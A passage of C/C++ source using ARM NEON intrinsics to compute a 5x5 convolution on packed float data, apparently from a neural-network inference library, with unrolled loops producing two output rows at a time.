float32x4_t _r07 = vld1q_f32(r0+28);
float32x4_t _k00 = vld1q_f32(k0);
float32x4_t _k01 = vld1q_f32(k0+4);
float32x4_t _k02 = vld1q_f32(k0+8);
float32x4_t _k03 = vld1q_f32(k0+12);
float32x4_t _k04 = vld1q_f32(k0+16);
k0 += 20;
_sum00 = vmlaq_f32(_sum00, _k00, _r00);
_sum00 = vmlaq_f32(_sum00, _k01, _r01);
_sum00 = vmlaq_f32(_sum00, _k02, _r02);
_sum00 = vmlaq_f32(_sum00, _k03, _r03);
_sum00 = vmlaq_f32(_sum00, _k04, _r04);
_sum01 = vmlaq_f32(_sum01, _k00, _r01);
_sum01 = vmlaq_f32(_sum01, _k01, _r02);
_sum01 = vmlaq_f32(_sum01, _k02, _r03);
_sum01 = vmlaq_f32(_sum01, _k03, _r04);
_sum01 = vmlaq_f32(_sum01, _k04, _r05);
_sum02 = vmlaq_f32(_sum02, _k00, _r02);
_sum02 = vmlaq_f32(_sum02, _k01, _r03);
_sum02 = vmlaq_f32(_sum02, _k02, _r04);
_sum02 = vmlaq_f32(_sum02, _k03, _r05);
_sum02 = vmlaq_f32(_sum02, _k04, _r06);
_sum03 = vmlaq_f32(_sum03, _k00, _r03);
_sum03 = vmlaq_f32(_sum03, _k01, _r04);
_sum03 = vmlaq_f32(_sum03, _k02, _r05);
_sum03 = vmlaq_f32(_sum03, _k03, _r06);
_sum03 = vmlaq_f32(_sum03, _k04, _r07);
float32x4_t _r10 = vld1q_f32(r1);
float32x4_t _r11 = vld1q_f32(r1+4);
float32x4_t _r12 = vld1q_f32(r1+8);
float32x4_t _r13 = vld1q_f32(r1+12);
float32x4_t _r14 = vld1q_f32(r1+16);
float32x4_t _r15 = vld1q_f32(r1+20);
float32x4_t _r16 = vld1q_f32(r1+24);
float32x4_t _r17 = vld1q_f32(r1+28);
float32x4_t _k10 = vld1q_f32(k0);
float32x4_t _k11 = vld1q_f32(k0+4);
float32x4_t _k12 = vld1q_f32(k0+8);
float32x4_t _k13 = vld1q_f32(k0+12);
float32x4_t _k14 = vld1q_f32(k0+16);
k0 += 20;
_sum10 = vmlaq_f32(_sum10, _k00, _r10);
_sum10 = vmlaq_f32(_sum10, _k01, _r11);
_sum10 = vmlaq_f32(_sum10, _k02, _r12);
_sum10 = vmlaq_f32(_sum10, _k03, _r13);
_sum10 = vmlaq_f32(_sum10, _k04, _r14);
_sum11 = vmlaq_f32(_sum11, _k00, _r11);
_sum11 = vmlaq_f32(_sum11, _k01, _r12);
_sum11 = vmlaq_f32(_sum11, _k02, _r13);
_sum11 = vmlaq_f32(_sum11, _k03, _r14);
_sum11 = vmlaq_f32(_sum11, _k04, _r15);
_sum12 = vmlaq_f32(_sum12, _k00, _r12);
_sum12 = vmlaq_f32(_sum12, _k01, _r13);
_sum12 = vmlaq_f32(_sum12, _k02, _r14);
_sum12 = vmlaq_f32(_sum12, _k03, _r15);
_sum12 = vmlaq_f32(_sum12, _k04, _r16);
_sum13 = vmlaq_f32(_sum13, _k00, _r13);
_sum13 = vmlaq_f32(_sum13, _k01, _r14);
_sum13 = vmlaq_f32(_sum13, _k02, _r15);
_sum13 = vmlaq_f32(_sum13, _k03, _r16);
_sum13 = vmlaq_f32(_sum13, _k04, _r17);
_sum00 = vmlaq_f32(_sum00, _k10, _r10);
_sum00 = vmlaq_f32(_sum00, _k11, _r11);
_sum00 = vmlaq_f32(_sum00, _k12, _r12);
_sum00 = vmlaq_f32(_sum00, _k13, _r13);
_sum00 = vmlaq_f32(_sum00, _k14, _r14);
_sum01 = vmlaq_f32(_sum01, _k10, _r11);
_sum01 = vmlaq_f32(_sum01, _k11, _r12);
_sum01 = vmlaq_f32(_sum01, _k12, _r13);
_sum01 = vmlaq_f32(_sum01, _k13, _r14);
_sum01 = vmlaq_f32(_sum01, _k14, _r15);
_sum02 = vmlaq_f32(_sum02, _k10, _r12);
_sum02 = vmlaq_f32(_sum02, _k11, _r13);
_sum02 = vmlaq_f32(_sum02, _k12, _r14);
_sum02 = vmlaq_f32(_sum02, _k13, _r15);
_sum02 = vmlaq_f32(_sum02, _k14, _r16);
_sum03 = vmlaq_f32(_sum03, _k10, _r13);
_sum03 = vmlaq_f32(_sum03, _k11, _r14);
_sum03 = vmlaq_f32(_sum03, _k12, _r15);
_sum03 = vmlaq_f32(_sum03, _k13, _r16);
_sum03 = vmlaq_f32(_sum03, _k14, _r17);
float32x4_t _r20 = vld1q_f32(r2);
float32x4_t _r21 = vld1q_f32(r2+4);
float32x4_t _r22 = vld1q_f32(r2+8);
float32x4_t _r23 = vld1q_f32(r2+12);
float32x4_t _r24 = vld1q_f32(r2+16);
float32x4_t _r25 = vld1q_f32(r2+20);
float32x4_t _r26 = vld1q_f32(r2+24);
float32x4_t _r27 = vld1q_f32(r2+28);
float32x4_t _k20 = vld1q_f32(k0);
float32x4_t _k21 = vld1q_f32(k0+4);
float32x4_t _k22 = vld1q_f32(k0+8);
float32x4_t _k23 = vld1q_f32(k0+12);
float32x4_t _k24 = vld1q_f32(k0+16);
k0 += 20;
_sum10 = vmlaq_f32(_sum10, _k10, _r20);
_sum10 = vmlaq_f32(_sum10, _k11, _r21);
_sum10 = vmlaq_f32(_sum10, _k12, _r22);
_sum10 = vmlaq_f32(_sum10, _k13, _r23);
_sum10 = vmlaq_f32(_sum10, _k14, _r24);
_sum11 = vmlaq_f32(_sum11, _k10, _r21);
_sum11 = vmlaq_f32(_sum11, _k11, _r22);
_sum11 = vmlaq_f32(_sum11, _k12, _r23);
_sum11 = vmlaq_f32(_sum11, _k13, _r24);
_sum11 = vmlaq_f32(_sum11, _k14, _r25);
_sum12 = vmlaq_f32(_sum12, _k10, _r22);
_sum12 = vmlaq_f32(_sum12, _k11, _r23);
_sum12 = vmlaq_f32(_sum12, _k12, _r24);
_sum12 = vmlaq_f32(_sum12, _k13, _r25);
_sum12 = vmlaq_f32(_sum12, _k14, _r26);
_sum13 = vmlaq_f32(_sum13, _k10, _r23);
_sum13 = vmlaq_f32(_sum13, _k11, _r24);
_sum13 = vmlaq_f32(_sum13, _k12, _r25);
_sum13 = vmlaq_f32(_sum13, _k13, _r26);
_sum13 = vmlaq_f32(_sum13, _k14, _r27);
_sum00 = vmlaq_f32(_sum00, _k20, _r20);
_sum00 = vmlaq_f32(_sum00, _k21, _r21);
_sum00 = vmlaq_f32(_sum00, _k22, _r22);
_sum00 = vmlaq_f32(_sum00, _k23, _r23);
_sum00 = vmlaq_f32(_sum00, _k24, _r24);
_sum01 = vmlaq_f32(_sum01, _k20, _r21);
_sum01 = vmlaq_f32(_sum01, _k21, _r22);
_sum01 = vmlaq_f32(_sum01, _k22, _r23);
_sum01 = vmlaq_f32(_sum01, _k23, _r24);
_sum01 = vmlaq_f32(_sum01, _k24, _r25);
_sum02 = vmlaq_f32(_sum02, _k20, _r22);
_sum02 = vmlaq_f32(_sum02, _k21, _r23);
_sum02 = vmlaq_f32(_sum02, _k22, _r24);
_sum02 = vmlaq_f32(_sum02, _k23, _r25);
_sum02 = vmlaq_f32(_sum02, _k24, _r26);
_sum03 = vmlaq_f32(_sum03, _k20, _r23);
_sum03 = vmlaq_f32(_sum03, _k21, _r24);
_sum03 = vmlaq_f32(_sum03, _k22, _r25);
_sum03 = vmlaq_f32(_sum03, _k23, _r26);
_sum03 = vmlaq_f32(_sum03, _k24, _r27);
float32x4_t _r30 = vld1q_f32(r3);
float32x4_t _r31 = vld1q_f32(r3+4);
float32x4_t _r32 = vld1q_f32(r3+8);
float32x4_t _r33 = vld1q_f32(r3+12);
float32x4_t _r34 = vld1q_f32(r3+16);
float32x4_t _r35 = vld1q_f32(r3+20);
float32x4_t _r36 = vld1q_f32(r3+24);
float32x4_t _r37 = vld1q_f32(r3+28);
float32x4_t _k30 = vld1q_f32(k0);
float32x4_t _k31 = vld1q_f32(k0+4);
float32x4_t _k32 = vld1q_f32(k0+8);
float32x4_t _k33 = vld1q_f32(k0+12);
float32x4_t _k34 = vld1q_f32(k0+16);
k0 += 20;
_sum10 = vmlaq_f32(_sum10, _k20, _r30);
_sum10 = vmlaq_f32(_sum10, _k21, _r31);
_sum10 = vmlaq_f32(_sum10, _k22, _r32);
_sum10 = vmlaq_f32(_sum10, _k23, _r33);
_sum10 = vmlaq_f32(_sum10, _k24, _r34);
_sum11 = vmlaq_f32(_sum11, _k20, _r31);
_sum11 = vmlaq_f32(_sum11, _k21, _r32);
_sum11 = vmlaq_f32(_sum11, _k22, _r33);
_sum11 = vmlaq_f32(_sum11, _k23, _r34);
_sum11 = vmlaq_f32(_sum11, _k24, _r35);
_sum12 = vmlaq_f32(_sum12, _k20, _r32);
_sum12 = vmlaq_f32(_sum12, _k21, _r33);
_sum12 = vmlaq_f32(_sum12, _k22, _r34);
_sum12 = vmlaq_f32(_sum12, _k23, _r35);
_sum12 = vmlaq_f32(_sum12, _k24, _r36);
_sum13 = vmlaq_f32(_sum13, _k20, _r33);
_sum13 = vmlaq_f32(_sum13, _k21, _r34);
_sum13 = vmlaq_f32(_sum13, _k22, _r35);
_sum13 = vmlaq_f32(_sum13, _k23, _r36);
_sum13 = vmlaq_f32(_sum13, _k24, _r37);
_sum00 = vmlaq_f32(_sum00, _k30, _r30);
_sum00 = vmlaq_f32(_sum00, _k31, _r31);
_sum00 = vmlaq_f32(_sum00, _k32, _r32);
_sum00 = vmlaq_f32(_sum00, _k33, _r33);
_sum00 = vmlaq_f32(_sum00, _k34, _r34);
_sum01 = vmlaq_f32(_sum01, _k30, _r31);
_sum01 = vmlaq_f32(_sum01, _k31, _r32);
_sum01 = vmlaq_f32(_sum01, _k32, _r33);
_sum01 = vmlaq_f32(_sum01, _k33, _r34);
_sum01 = vmlaq_f32(_sum01, _k34, _r35);
_sum02 = vmlaq_f32(_sum02, _k30, _r32);
_sum02 = vmlaq_f32(_sum02, _k31, _r33);
_sum02 = vmlaq_f32(_sum02, _k32, _r34);
_sum02 = vmlaq_f32(_sum02, _k33, _r35);
_sum02 = vmlaq_f32(_sum02, _k34, _r36);
_sum03 = vmlaq_f32(_sum03, _k30, _r33);
_sum03 = vmlaq_f32(_sum03, _k31, _r34);
_sum03 = vmlaq_f32(_sum03, _k32, _r35);
_sum03 = vmlaq_f32(_sum03, _k33, _r36);
_sum03 = vmlaq_f32(_sum03, _k34, _r37);
float32x4_t _r40 = vld1q_f32(r4);
float32x4_t _r41 = vld1q_f32(r4+4);
float32x4_t _r42 = vld1q_f32(r4+8);
float32x4_t _r43 = vld1q_f32(r4+12);
float32x4_t _r44 = vld1q_f32(r4+16);
float32x4_t _r45 = vld1q_f32(r4+20);
float32x4_t _r46 = vld1q_f32(r4+24);
float32x4_t _r47 = vld1q_f32(r4+28);
float32x4_t _k40 = vld1q_f32(k0);
float32x4_t _k41 = vld1q_f32(k0+4);
float32x4_t _k42 = vld1q_f32(k0+8);
float32x4_t _k43 = vld1q_f32(k0+12);
float32x4_t _k44 = vld1q_f32(k0+16);
k0 -= 80;
_sum10 = vmlaq_f32(_sum10, _k30, _r40);
_sum10 = vmlaq_f32(_sum10, _k31, _r41);
_sum10 = vmlaq_f32(_sum10, _k32, _r42);
_sum10 = vmlaq_f32(_sum10, _k33, _r43);
_sum10 = vmlaq_f32(_sum10, _k34, _r44);
_sum11 = vmlaq_f32(_sum11, _k30, _r41);
_sum11 = vmlaq_f32(_sum11, _k31, _r42);
_sum11 = vmlaq_f32(_sum11, _k32, _r43);
_sum11 = vmlaq_f32(_sum11, _k33, _r44);
_sum11 = vmlaq_f32(_sum11, _k34, _r45);
_sum12 = vmlaq_f32(_sum12, _k30, _r42);
_sum12 = vmlaq_f32(_sum12, _k31, _r43);
_sum12 = vmlaq_f32(_sum12, _k32, _r44);
_sum12 = vmlaq_f32(_sum12, _k33, _r45);
_sum12 = vmlaq_f32(_sum12, _k34, _r46);
_sum13 = vmlaq_f32(_sum13, _k30, _r43);
_sum13 = vmlaq_f32(_sum13, _k31, _r44);
_sum13 = vmlaq_f32(_sum13, _k32, _r45);
_sum13 = vmlaq_f32(_sum13, _k33, _r46);
_sum13 = vmlaq_f32(_sum13, _k34, _r47);
_sum00 = vmlaq_f32(_sum00, _k40, _r40);
_sum00 = vmlaq_f32(_sum00, _k41, _r41);
_sum00 = vmlaq_f32(_sum00, _k42, _r42);
_sum00 = vmlaq_f32(_sum00, _k43, _r43);
_sum00 = vmlaq_f32(_sum00, _k44, _r44);
_sum01 = vmlaq_f32(_sum01, _k40, _r41);
_sum01 = vmlaq_f32(_sum01, _k41, _r42);
_sum01 = vmlaq_f32(_sum01, _k42, _r43);
_sum01 = vmlaq_f32(_sum01, _k43, _r44);
_sum01 = vmlaq_f32(_sum01, _k44, _r45);
_sum02 = vmlaq_f32(_sum02, _k40, _r42);
_sum02 = vmlaq_f32(_sum02, _k41, _r43);
_sum02 = vmlaq_f32(_sum02, _k42, _r44);
_sum02 = vmlaq_f32(_sum02, _k43, _r45);
_sum02 = vmlaq_f32(_sum02, _k44, _r46);
_sum03 = vmlaq_f32(_sum03, _k40, _r43);
_sum03 = vmlaq_f32(_sum03, _k41, _r44);
_sum03 = vmlaq_f32(_sum03, _k42, _r45);
_sum03 = vmlaq_f32(_sum03, _k43, _r46);
_sum03 = vmlaq_f32(_sum03, _k44, _r47);
float32x4_t _r50 = vld1q_f32(r5);
float32x4_t _r51 = vld1q_f32(r5+4);
float32x4_t _r52 = vld1q_f32(r5+8);
float32x4_t _r53 = vld1q_f32(r5+12);
float32x4_t _r54 = vld1q_f32(r5+16);
float32x4_t _r55 = vld1q_f32(r5+20);
float32x4_t _r56 = vld1q_f32(r5+24);
float32x4_t _r57 = vld1q_f32(r5+28);
_sum10 = vmlaq_f32(_sum10, _k40, _r50);
_sum10 = vmlaq_f32(_sum10, _k41, _r51);
_sum10 = vmlaq_f32(_sum10, _k42, _r52);
_sum10 = vmlaq_f32(_sum10, _k43, _r53);
_sum10 = vmlaq_f32(_sum10, _k44, _r54);
_sum11 = vmlaq_f32(_sum11, _k40, _r51);
_sum11 = vmlaq_f32(_sum11, _k41, _r52);
_sum11 = vmlaq_f32(_sum11, _k42, _r53);
_sum11 = vmlaq_f32(_sum11, _k43, _r54);
_sum11 = vmlaq_f32(_sum11, _k44, _r55);
_sum12 = vmlaq_f32(_sum12, _k40, _r52);
_sum12 = vmlaq_f32(_sum12, _k41, _r53);
_sum12 = vmlaq_f32(_sum12, _k42, _r54);
_sum12 = vmlaq_f32(_sum12, _k43, _r55);
_sum12 = vmlaq_f32(_sum12, _k44, _r56);
_sum13 = vmlaq_f32(_sum13, _k40, _r53);
_sum13 = vmlaq_f32(_sum13, _k41, _r54);
_sum13 = vmlaq_f32(_sum13, _k42, _r55);
_sum13 = vmlaq_f32(_sum13, _k43, _r56);
_sum13 = vmlaq_f32(_sum13, _k44, _r57);
vst1q_f32(outptr0, _sum00);
vst1q_f32(outptr0+4, _sum01);
vst1q_f32(outptr0+8, _sum02);
vst1q_f32(outptr0+12, _sum03);
vst1q_f32(outptr1, _sum10);
vst1q_f32(outptr1+4, _sum11);
vst1q_f32(outptr1+8, _sum12);
vst1q_f32(outptr1+12, _sum13);
r0 += 16;
r1 += 16;
r2 += 16;
r3 += 16;
r4 += 16;
r5 += 16;
outptr0 += 16;
outptr1 += 16;
}
for (; j+1 < outw; j+=2)
{
float32x4_t _sum00 = _bias0;
float32x4_t _sum01 = _bias0;
float32x4_t _sum10 = _bias0;
float32x4_t _sum11 = _bias0;
float32x4_t _r00 = vld1q_f32(r0);
float32x4_t _r01 = vld1q_f32(r0+4);
float32x4_t _r02 = vld1q_f32(r0+8);
float32x4_t _r03 = vld1q_f32(r0+12);
float32x4_t _r04 = vld1q_f32(r0+16);
float32x4_t _r05 = vld1q_f32(r0+20);
float32x4_t _k00 = vld1q_f32(k0);
float32x4_t _k01 = vld1q_f32(k0+4);
float32x4_t _k02 = vld1q_f32(k0+8);
float32x4_t _k03 = vld1q_f32(k0+12);
float32x4_t _k04 = vld1q_f32(k0+16);
k0 += 20;
_sum00 = vmlaq_f32(_sum00, _k00, _r00);
_sum00 = vmlaq_f32(_sum00, _k01, _r01);
_sum00 = vmlaq_f32(_sum00, _k02, _r02);
_sum00 = vmlaq_f32(_sum00, _k03, _r03);
_sum00 = vmlaq_f32(_sum00, _k04, _r04);
_sum01 = vmlaq_f32(_sum01, _k00, _r01);
_sum01 = vmlaq_f32(_sum01, _k01, _r02);
_sum01 = vmlaq_f32(_sum01, _k02, _r03);
_sum01 = vmlaq_f32(_sum01, _k03, _r04);
_sum01 = vmlaq_f32(_sum01, _k04, _r05);
float32x4_t _r10 = vld1q_f32(r1);
float32x4_t _r11 = vld1q_f32(r1+4);
float32x4_t _r12 = vld1q_f32(r1+8);
float32x4_t _r13 = vld1q_f32(r1+12);
float32x4_t _r14 = vld1q_f32(r1+16);
float32x4_t _r15 = vld1q_f32(r1+20);
float32x4_t _k10 = vld1q_f32(k0);
float32x4_t _k11 = vld1q_f32(k0+4);
float32x4_t _k12 = vld1q_f32(k0+8);
float32x4_t _k13 = vld1q_f32(k0+12);
float32x4_t _k14 = vld1q_f32(k0+16);
k0 += 20;
_sum10 = vmlaq_f32(_sum10, _k00, _r10);
_sum10 = vmlaq_f32(_sum10, _k01, _r11);
_sum10 = vmlaq_f32(_sum10, _k02, _r12);
_sum10 = vmlaq_f32(_sum10, _k03, _r13);
_sum10 = vmlaq_f32(_sum10, _k04, _r14);
_sum11 = vmlaq_f32(_sum11, _k00, _r11);
_sum11 = vmlaq_f32(_sum11, _k01, _r12);
_sum11 = vmlaq_f32(_sum11, _k02, _r13);
_sum11 = vmlaq_f32(_sum11, _k03, _r14);
_sum11 = vmlaq_f32(_sum11, _k04, _r15);
_sum00 = vmlaq_f32(_sum00, _k10, _r10);
_sum00 = vmlaq_f32(_sum00, _k11, _r11);
_sum00 = vmlaq_f32(_sum00, _k12, _r12);
_sum00 = vmlaq_f32(_sum00, _k13, _r13);
_sum00 = vmlaq_f32(_sum00, _k14, _r14);
_sum01 = vmlaq_f32(_sum01, _k10, _r11);
_sum01 = vmlaq_f32(_sum01, _k11, _r12);
_sum01 = vmlaq_f32(_sum01, _k12, _r13);
_sum01 = vmlaq_f32(_sum01, _k13, _r14);
_sum01 = vmlaq_f32(_sum01, _k14, _r15);
float32x4_t _r20 = vld1q_f32(r2);
float32x4_t _r21 = vld1q_f32(r2+4);
float32x4_t _r22 = vld1q_f32(r2+8);
float32x4_t _r23 = vld1q_f32(r2+12);
float32x4_t _r24 = vld1q_f32(r2+16);
float32x4_t _r25 = vld1q_f32(r2+20);
float32x4_t _k20 = vld1q_f32(k0);
float32x4_t _k21 = vld1q_f32(k0+4);
float32x4_t _k22 = vld1q_f32(k0+8);
float32x4_t _k23 = vld1q_f32(k0+12);
float32x4_t _k24 = vld1q_f32(k0+16);
k0 += 20;
_sum10 = vmlaq_f32(_sum10, _k10, _r20);
_sum10 = vmlaq_f32(_sum10, _k11, _r21);
_sum10 = vmlaq_f32(_sum10, _k12, _r22);
_sum10 = vmlaq_f32(_sum10, _k13, _r23);
_sum10 = vmlaq_f32(_sum10, _k14, _r24);
_sum11 = vmlaq_f32(_sum11, _k10, _r21);
_sum11 = vmlaq_f32(_sum11, _k11, _r22);
_sum11 = vmlaq_f32(_sum11, _k12, _r23);
_sum11 = vmlaq_f32(_sum11, _k13, _r24);
_sum11 = vmlaq_f32(_sum11, _k14, _r25);
_sum00 = vmlaq_f32(_sum00, _k20, _r20);
_sum00 = vmlaq_f32(_sum00, _k21, _r21);
_sum00 = vmlaq_f32(_sum00, _k22, _r22);
_sum00 = vmlaq_f32(_sum00, _k23, _r23);
_sum00 = vmlaq_f32(_sum00, _k24, _r24);
_sum01 = vmlaq_f32(_sum01, _k20, _r21);
_sum01 = vmlaq_f32(_sum01, _k21, _r22);
_sum01 = vmlaq_f32(_sum01, _k22, _r23);
_sum01 = vmlaq_f32(_sum01, _k23, _r24);
_sum01 = vmlaq_f32(_sum01, _k24, _r25);
float32x4_t _r30 = vld1q_f32(r3);
float32x4_t _r31 = vld1q_f32(r3+4);
float32x4_t _r32 = vld1q_f32(r3+8);
float32x4_t _r33 = vld1q_f32(r3+12);
float32x4_t _r34 = vld1q_f32(r3+16);
float32x4_t _r35 = vld1q_f32(r3+20);
float32x4_t _k30 = vld1q_f32(k0);
float32x4_t _k31 = vld1q_f32(k0+4);
float32x4_t _k32 = vld1q_f32(k0+8);
float32x4_t _k33 = vld1q_f32(k0+12);
float32x4_t _k34 = vld1q_f32(k0+16);
k0 += 20;
_sum10 = vmlaq_f32(_sum10, _k20, _r30);
_sum10 = vmlaq_f32(_sum10, _k21, _r31);
_sum10 = vmlaq_f32(_sum10, _k22, _r32);
_sum10 = vmlaq_f32(_sum10, _k23, _r33);
_sum10 = vmlaq_f32(_sum10, _k24, _r34);
_sum11 = vmlaq_f32(_sum11, _k20, _r31);
_sum11 = vmlaq_f32(_sum11, _k21, _r32);
_sum11 = vmlaq_f32(_sum11, _k22, _r33);
_sum11 = vmlaq_f32(_sum11, _k23, _r34);
_sum11 = vmlaq_f32(_sum11, _k24, _r35);
_sum00 = vmlaq_f32(_sum00, _k30, _r30);
_sum00 = vmlaq_f32(_sum00, _k31, _r31);
_sum00 = vmlaq_f32(_sum00, _k32, _r32);
_sum00 = vmlaq_f32(_sum00, _k33, _r33);
_sum00 = vmlaq_f32(_sum00, _k34, _r34);
_sum01 = vmlaq_f32(_sum01, _k30, _r31);
_sum01 = vmlaq_f32(_sum01, _k31, _r32);
_sum01 = vmlaq_f32(_sum01, _k32, _r33);
_sum01 = vmlaq_f32(_sum01, _k33, _r34);
_sum01 = vmlaq_f32(_sum01, _k34, _r35);
float32x4_t _r40 = vld1q_f32(r4);
float32x4_t _r41 = vld1q_f32(r4+4);
float32x4_t _r42 = vld1q_f32(r4+8);
float32x4_t _r43 = vld1q_f32(r4+12);
float32x4_t _r44 = vld1q_f32(r4+16);
float32x4_t _r45 = vld1q_f32(r4+20);
float32x4_t _k40 = vld1q_f32(k0);
float32x4_t _k41 = vld1q_f32(k0+4);
float32x4_t _k42 = vld1q_f32(k0+8);
float32x4_t _k43 = vld1q_f32(k0+12);
float32x4_t _k44 = vld1q_f32(k0+16);
k0 -= 80;
_sum10 = vmlaq_f32(_sum10, _k30, _r40);
_sum10 = vmlaq_f32(_sum10, _k31, _r41);
_sum10 = vmlaq_f32(_sum10, _k32, _r42);
_sum10 = vmlaq_f32(_sum10, _k33, _r43);
_sum10 = vmlaq_f32(_sum10, _k34, _r44);
_sum11 = vmlaq_f32(_sum11, _k30, _r41);
_sum11 = vmlaq_f32(_sum11, _k31, _r42);
_sum11 = vmlaq_f32(_sum11, _k32, _r43);
_sum11 = vmlaq_f32(_sum11, _k33, _r44);
_sum11 = vmlaq_f32(_sum11, _k34, _r45);
_sum00 = vmlaq_f32(_sum00, _k40, _r40);
_sum00 = vmlaq_f32(_sum00, _k41, _r41);
_sum00 = vmlaq_f32(_sum00, _k42, _r42);
_sum00 = vmlaq_f32(_sum00, _k43, _r43);
_sum00 = vmlaq_f32(_sum00, _k44, _r44);
_sum01 = vmlaq_f32(_sum01, _k40, _r41);
_sum01 = vmlaq_f32(_sum01, _k41, _r42);
_sum01 = vmlaq_f32(_sum01, _k42, _r43);
_sum01 = vmlaq_f32(_sum01, _k43, _r44);
_sum01 = vmlaq_f32(_sum01, _k44, _r45);
float32x4_t _r50 = vld1q_f32(r5);
float32x4_t _r51 = vld1q_f32(r5+4);
float32x4_t _r52 = vld1q_f32(r5+8);
float32x4_t _r53 = vld1q_f32(r5+12);
float32x4_t _r54 = vld1q_f32(r5+16);
float32x4_t _r55 = vld1q_f32(r5+20);
_sum10 = vmlaq_f32(_sum10, _k40, _r50);
_sum10 = vmlaq_f32(_sum10, _k41, _r51);
_sum10 = vmlaq_f32(_sum10, _k42, _r52);
_sum10 = vmlaq_f32(_sum10, _k43, _r53);
_sum10 = vmlaq_f32(_sum10, _k44, _r54);
_sum11 = vmlaq_f32(_sum11, _k40, _r51);
_sum11 = vmlaq_f32(_sum11, _k41, _r52);
_sum11 = vmlaq_f32(_sum11, _k42, _r53);
_sum11 = vmlaq_f32(_sum11, _k43, _r54);
_sum11 = vmlaq_f32(_sum11, _k44, _r55);
vst1q_f32(outptr0, _sum00);
vst1q_f32(outptr0+4, _sum01);
vst1q_f32(outptr1, _sum10);
vst1q_f32(outptr1+4, _sum11);
r0 += 8;
r1 += 8;
r2 += 8;
r3 += 8;
r4 += 8;
r5 += 8;
outptr0 += 8;
outptr1 += 8;
}
for (; j < outw; j++)
{
float32x4_t _sum0 = _bias0;
float32x4_t _sum1 = _bias0;
float32x4_t _r00 = vld1q_f32(r0);
float32x4_t _r01 = vld1q_f32(r0+4);
float32x4_t _r02 = vld1q_f32(r0+8);
float32x4_t _r03 = vld1q_f32(r0+12);
float32x4_t _r04 = vld1q_f32(r0+16);
float32x4_t _k00 = vld1q_f32(k0);
float32x4_t _k01 = vld1q_f32(k0+4);
float32x4_t _k02 = vld1q_f32(k0+8);
float32x4_t _k03 = vld1q_f32(k0+12);
float32x4_t _k04 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k00, _r00);
_sum0 = vmlaq_f32(_sum0, _k01, _r01);
_sum0 = vmlaq_f32(_sum0, _k02, _r02);
_sum0 = vmlaq_f32(_sum0, _k03, _r03);
_sum0 = vmlaq_f32(_sum0, _k04, _r04);
float32x4_t _r10 = vld1q_f32(r1);
float32x4_t _r11 = vld1q_f32(r1+4);
float32x4_t _r12 = vld1q_f32(r1+8);
float32x4_t _r13 = vld1q_f32(r1+12);
float32x4_t _r14 = vld1q_f32(r1+16);
float32x4_t _k10 = vld1q_f32(k0);
float32x4_t _k11 = vld1q_f32(k0+4);
float32x4_t _k12 = vld1q_f32(k0+8);
float32x4_t _k13 = vld1q_f32(k0+12);
float32x4_t _k14 = vld1q_f32(k0+16);
k0 += 20;
_sum1 = vmlaq_f32(_sum1, _k00, _r10);
_sum1 = vmlaq_f32(_sum1, _k01, _r11);
_sum1 = vmlaq_f32(_sum1, _k02, _r12);
_sum1 = vmlaq_f32(_sum1, _k03, _r13);
_sum1 = vmlaq_f32(_sum1, _k04, _r14);
_sum0 = vmlaq_f32(_sum0, _k10, _r10);
_sum0 = vmlaq_f32(_sum0, _k11, _r11);
_sum0 = vmlaq_f32(_sum0, _k12, _r12);
_sum0 = vmlaq_f32(_sum0, _k13, _r13);
_sum0 = vmlaq_f32(_sum0, _k14, _r14);
float32x4_t _r20 = vld1q_f32(r2);
float32x4_t _r21 = vld1q_f32(r2+4);
float32x4_t _r22 = vld1q_f32(r2+8);
float32x4_t _r23 = vld1q_f32(r2+12);
float32x4_t _r24 = vld1q_f32(r2+16);
float32x4_t _k20 = vld1q_f32(k0);
float32x4_t _k21 = vld1q_f32(k0+4);
float32x4_t _k22 = vld1q_f32(k0+8);
float32x4_t _k23 = vld1q_f32(k0+12);
float32x4_t _k24 = vld1q_f32(k0+16);
k0 += 20;
_sum1 = vmlaq_f32(_sum1, _k10, _r20);
_sum1 = vmlaq_f32(_sum1, _k11, _r21);
_sum1 = vmlaq_f32(_sum1, _k12, _r22);
_sum1 = vmlaq_f32(_sum1, _k13, _r23);
_sum1 = vmlaq_f32(_sum1, _k14, _r24);
_sum0 = vmlaq_f32(_sum0, _k20, _r20);
_sum0 = vmlaq_f32(_sum0, _k21, _r21);
_sum0 = vmlaq_f32(_sum0, _k22, _r22);
_sum0 = vmlaq_f32(_sum0, _k23, _r23);
_sum0 = vmlaq_f32(_sum0, _k24, _r24);
float32x4_t _r30 = vld1q_f32(r3);
float32x4_t _r31 = vld1q_f32(r3+4);
float32x4_t _r32 = vld1q_f32(r3+8);
float32x4_t _r33 = vld1q_f32(r3+12);
float32x4_t _r34 = vld1q_f32(r3+16);
float32x4_t _k30 = vld1q_f32(k0);
float32x4_t _k31 = vld1q_f32(k0+4);
float32x4_t _k32 = vld1q_f32(k0+8);
float32x4_t _k33 = vld1q_f32(k0+12);
float32x4_t _k34 = vld1q_f32(k0+16);
k0 += 20;
_sum1 = vmlaq_f32(_sum1, _k20, _r30);
_sum1 = vmlaq_f32(_sum1, _k21, _r31);
_sum1 = vmlaq_f32(_sum1, _k22, _r32);
_sum1 = vmlaq_f32(_sum1, _k23, _r33);
_sum1 = vmlaq_f32(_sum1, _k24, _r34);
_sum0 = vmlaq_f32(_sum0, _k30, _r30);
_sum0 = vmlaq_f32(_sum0, _k31, _r31);
_sum0 = vmlaq_f32(_sum0, _k32, _r32);
_sum0 = vmlaq_f32(_sum0, _k33, _r33);
_sum0 = vmlaq_f32(_sum0, _k34, _r34);
float32x4_t _r40 = vld1q_f32(r4);
float32x4_t _r41 = vld1q_f32(r4+4);
float32x4_t _r42 = vld1q_f32(r4+8);
float32x4_t _r43 = vld1q_f32(r4+12);
float32x4_t _r44 = vld1q_f32(r4+16);
float32x4_t _k40 = vld1q_f32(k0);
float32x4_t _k41 = vld1q_f32(k0+4);
float32x4_t _k42 = vld1q_f32(k0+8);
float32x4_t _k43 = vld1q_f32(k0+12);
float32x4_t _k44 = vld1q_f32(k0+16);
k0 -= 80;
_sum1 = vmlaq_f32(_sum1, _k30, _r40);
_sum1 = vmlaq_f32(_sum1, _k31, _r41);
_sum1 = vmlaq_f32(_sum1, _k32, _r42);
_sum1 = vmlaq_f32(_sum1, _k33, _r43);
_sum1 = vmlaq_f32(_sum1, _k34, _r44);
_sum0 = vmlaq_f32(_sum0, _k40, _r40);
_sum0 = vmlaq_f32(_sum0, _k41, _r41);
_sum0 = vmlaq_f32(_sum0, _k42, _r42);
_sum0 = vmlaq_f32(_sum0, _k43, _r43);
